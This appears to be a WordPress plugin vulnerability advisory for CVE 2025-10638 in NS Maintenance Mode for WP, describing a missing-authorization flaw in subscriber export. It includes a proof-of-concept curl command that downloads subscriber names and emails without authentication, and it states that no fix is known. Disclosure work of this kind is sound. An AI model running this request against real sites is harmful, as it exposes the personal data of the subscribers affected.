NS Maintenance Mode for WP <= 1.3.1 – Unauthenticated Subscribers Export | CVE 2025-10638 | Plugin Vulnerabilities

Description

The plugin lacks authorization in its subscriber export function allowing unauthenticated attackers to download a list of a site's subscribers containing their name and email address

Proof of Concept

From the WordPress dashboard (after activating the plugin):

1) Go to the Subscribers menu (the plugin registers a public 'subscriber' post type).
2) Click Add New and enter Name and Email (the plugin stores these in post meta fields).
3) Create multiple subscribers to see multiple lines in the CSV output.

After that, run the command:

`curl -s -X POST "http://target.com/wp-admin/admin-ajax.php"   -d "action=ns_mm_create_csv_subscriber"`

You'll see a list of all subscribers.

Affects Plugins

ns-maintenance-mode-for-wp

No known fix

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Verified

Yes

WPVDB ID

1998a079-d986-47fe-907f-d4d295b06603

Timeline

Publicly Published

2025-10-01 (about 2 months ago)

Added

2025-10-01 (about 2 months ago)

Last Updated

2025-10-01 (about 2 months ago)

Other

Published

Title

Published

2025-03-27

Title

Conversios.io < 7.2.4 - Missing Authorization

Published

2024-01-17

Title

InstaWP Connect < 0.1.0.9 - Missing Authorization to Arbitrary Options Update

Published

2025-01-15

Title

ApplyOnline – Application Form Builder and Manager < 2.6.7.2 - Missing Authorization

Published

2024-03-26

Title

Networker - Tech News WordPress Theme with Dark Mode < 1.1.10 - Missing Authorization

Published

2025-10-16

Title

Social proof testimonials and reviews by Repuso < 5.30 - Missing Authorization